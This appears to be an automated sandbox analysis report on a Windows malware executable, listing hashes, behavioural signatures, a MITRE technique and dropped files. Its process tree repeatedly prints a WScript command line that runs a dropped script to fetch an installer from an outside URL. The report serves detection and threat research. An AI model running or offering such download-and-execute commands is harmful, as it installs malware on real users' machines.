acf390f0aaba77cc9e7f143a83ef2e7de6db98c917e9de80ea9d7d2a2fb70349

General

Target

acf390f0aaba77cc9e7f143a83ef2e7de6db98c917e9de80ea9d7d2a2fb70349.exe
Size

184KB
MD5

7f5711e7b81ee04254923efae6cded31
SHA1

b19c2dddec5341906dcf5dc2e63bbf20d2a2bca7
SHA256

acf390f0aaba77cc9e7f143a83ef2e7de6db98c917e9de80ea9d7d2a2fb70349
SHA512

f204c29fcc3df68dfaa6700da5656c6e55e6c3e962e4708d69e645f15f86c7a01e0fec9dd34acb6665069b7ee04bd8ff2893c544f1d1f9875eb43a8b47850f2f
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3/:/7BSH8zUB+nGESaaRvoB7FJNndnm

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 15 IoCs

flow	pid	Process
3	1364	WScript.exe
6	1364	WScript.exe
7	1072	WScript.exe
9	1072	WScript.exe
10	980	WScript.exe
12	980	WScript.exe
13	1516	WScript.exe
17	1516	WScript.exe
19	1516	WScript.exe
21	1516	WScript.exe
22	1516	WScript.exe
23	1516	WScript.exe
26	1516	WScript.exe
27	1516	WScript.exe
28	1516	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	7	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	10	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 876 wrote to memory of 1364	876	acf390f0aaba77cc9e7f143a83ef2e7de6db98c917e9de80ea9d7d2a2fb70349.exe	28
PID 876 wrote to memory of 1364	876	acf390f0aaba77cc9e7f143a83ef2e7de6db98c917e9de80ea9d7d2a2fb70349.exe	28
PID 876 wrote to memory of 1364	876	acf390f0aaba77cc9e7f143a83ef2e7de6db98c917e9de80ea9d7d2a2fb70349.exe	28
PID 876 wrote to memory of 1364	876	acf390f0aaba77cc9e7f143a83ef2e7de6db98c917e9de80ea9d7d2a2fb70349.exe	28
PID 876 wrote to memory of 1072	876	acf390f0aaba77cc9e7f143a83ef2e7de6db98c917e9de80ea9d7d2a2fb70349.exe	31
PID 876 wrote to memory of 1072	876	acf390f0aaba77cc9e7f143a83ef2e7de6db98c917e9de80ea9d7d2a2fb70349.exe	31
PID 876 wrote to memory of 1072	876	acf390f0aaba77cc9e7f143a83ef2e7de6db98c917e9de80ea9d7d2a2fb70349.exe	31
PID 876 wrote to memory of 1072	876	acf390f0aaba77cc9e7f143a83ef2e7de6db98c917e9de80ea9d7d2a2fb70349.exe	31
PID 876 wrote to memory of 980	876	acf390f0aaba77cc9e7f143a83ef2e7de6db98c917e9de80ea9d7d2a2fb70349.exe	32
PID 876 wrote to memory of 980	876	acf390f0aaba77cc9e7f143a83ef2e7de6db98c917e9de80ea9d7d2a2fb70349.exe	32
PID 876 wrote to memory of 980	876	acf390f0aaba77cc9e7f143a83ef2e7de6db98c917e9de80ea9d7d2a2fb70349.exe	32
PID 876 wrote to memory of 980	876	acf390f0aaba77cc9e7f143a83ef2e7de6db98c917e9de80ea9d7d2a2fb70349.exe	32
PID 876 wrote to memory of 1516	876	acf390f0aaba77cc9e7f143a83ef2e7de6db98c917e9de80ea9d7d2a2fb70349.exe	33
PID 876 wrote to memory of 1516	876	acf390f0aaba77cc9e7f143a83ef2e7de6db98c917e9de80ea9d7d2a2fb70349.exe	33
PID 876 wrote to memory of 1516	876	acf390f0aaba77cc9e7f143a83ef2e7de6db98c917e9de80ea9d7d2a2fb70349.exe	33
PID 876 wrote to memory of 1516	876	acf390f0aaba77cc9e7f143a83ef2e7de6db98c917e9de80ea9d7d2a2fb70349.exe	33

C:\Users\Admin\AppData\Local\Temp\acf390f0aaba77cc9e7f143a83ef2e7de6db98c917e9de80ea9d7d2a2fb70349.exe
"C:\Users\Admin\AppData\Local\Temp\acf390f0aaba77cc9e7f143a83ef2e7de6db98c917e9de80ea9d7d2a2fb70349.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:876
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1739.js" http://www.djapp.info/?domain=DBTxfZTyRl.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGL C:\Users\Admin\AppData\Local\Temp\fuf1739.exe
  2⤵
  - Blocklisted process makes network request
  PID:1364
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1739.js" http://www.djapp.info/?domain=DBTxfZTyRl.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGL C:\Users\Admin\AppData\Local\Temp\fuf1739.exe
  2⤵
  - Blocklisted process makes network request
  PID:1072
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1739.js" http://www.djapp.info/?domain=DBTxfZTyRl.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGL C:\Users\Admin\AppData\Local\Temp\fuf1739.exe
  2⤵
  - Blocklisted process makes network request
  PID:980
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1739.js" http://www.djapp.info/?domain=DBTxfZTyRl.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGL C:\Users\Admin\AppData\Local\Temp\fuf1739.exe
  2⤵
  - Blocklisted process makes network request
  PID:1516

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\fuf1739.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\RX0FNEJ4.txt

Filesize
100B

MD5
9e55e700c86f91e8b94f4d71560b139e

SHA1
a28b5670199ddc321a97db07a75bc61289e35f05

SHA256
70bf4b7cfba17f6ac5d2df2179a2cee1f78521e18bce4996f30dc85a177ebb89

SHA512
e395b869b1293236ffc9ccba89e255f2a2d0bca019d37134a253b4168a55cb2fdeb0c4369bae95c7e584c641bd4e3a1bd1e8c960973a8d3c02d5345b4ac8d19a

Download Submit
memory/876-54-0x0000000076771000-0x0000000076773000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing